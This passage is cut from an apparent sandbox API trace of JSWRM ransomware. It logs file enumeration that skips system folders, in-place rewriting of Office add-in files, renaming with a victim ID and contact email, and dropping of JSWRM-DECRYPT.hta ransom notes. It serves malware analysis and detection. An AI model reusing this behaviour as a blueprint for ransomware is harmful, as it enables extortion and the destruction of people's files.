ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName=".", cAlternateFileName="")) returned 0x231f80 [0126.434] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.434] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x167a9331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4204a11a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="..", cAlternateFileName="")) returned 1 [0126.434] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.434] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.434] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4204a11a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4204a11a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4204a11a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.434] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.435] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.435] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.435] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.435] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.435] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.435] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.435] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.435] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.435] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.435] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x167a9331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10a6, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.435] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0126.435] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0126.435] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0126.435] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0126.435] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0126.435] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0126.435] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0126.435] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0126.435] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0126.435] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0126.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x240f98, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x2412e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\en\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\en\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.436] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4262) returned 1 [0126.436] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10a0) returned 0x278330 [0126.436] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x10a0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x10a0, lpOverlapped=0x0) returned 1 [0126.440] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.441] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x10a0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x10a0, lpOverlapped=0x0) returned 1 [0126.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.441] CloseHandle (hObject=0x338) returned 1 [0126.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f1b0 [0126.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0126.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0126.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0126.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0126.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.441] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\en\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\en\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\en\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\en\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f1b0 | out: hHeap=0x1e0000) returned 1 [0126.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0126.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0126.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0126.442] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x167a9331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10a6, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 0 [0126.442] FindClose (in: hFindFile=0x231f80 | out: hFindFile=0x231f80) returned 1 [0126.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0126.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0126.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0126.442] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="es", cAlternateFileName="")) returned 1 [0126.443] lstrcmpiW (lpString1="es", lpString2=".") returned 1 [0126.443] lstrcmpiW (lpString1="es", lpString2="..") returned 1 [0126.443] lstrcmpiW (lpString1="es", lpString2="...") returned 1 [0126.443] lstrcmpiW (lpString1="es", lpString2="windows") returned -1 [0126.443] lstrcmpiW (lpString1="es", lpString2="recovery") returned -1 [0126.443] lstrcmpiW (lpString1="es", lpString2="perflogs") returned -1 [0126.443] lstrcmpiW (lpString1="es", lpString2="documents and settings") returned 1 [0126.443] lstrcmpiW (lpString1="es", lpString2="$RECYCLE.BIN") returned 1 [0126.443] lstrcmpiW (lpString1="es", lpString2="system volume information") returned -1 [0126.443] lstrcmpiW (lpString1="es", lpString2="msocache") returned -1 [0126.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0126.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0126.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0126.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0126.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0126.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0126.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\es\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\es\\jswrm-decrypt.hta")) returned 0xffffffff [0126.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0126.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0126.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x278330 [0126.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0126.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27a100 [0126.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0126.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0126.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0126.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\es\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\es\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.445] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.445] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.446] CloseHandle (hObject=0x314) returned 1 [0126.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0126.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27a100 | out: hHeap=0x1e0000) returned 1 [0126.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0126.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0126.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0126.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0126.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0126.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0126.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0126.447] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\es\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\es\\jswrm-decrypt.hta")) returned 0x20 [0126.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0126.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0126.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0126.447] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\es\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x420702d6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName=".", cAlternateFileName="")) returned 0x231e80 [0126.447] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.447] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x420702d6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="..", cAlternateFileName="")) returned 1 [0126.447] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.447] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.447] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x420702d6, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x420702d6, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x420702d6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.447] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.447] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.447] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.447] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.447] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.447] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.447] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.447] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.447] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0126.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0126.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0126.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0126.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0126.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0126.448] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16783027, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1135, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.448] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0126.448] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0126.448] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0126.448] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0126.448] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0126.448] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0126.448] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0126.448] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0126.448] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0126.448] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0126.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0126.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x241268, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0126.448] 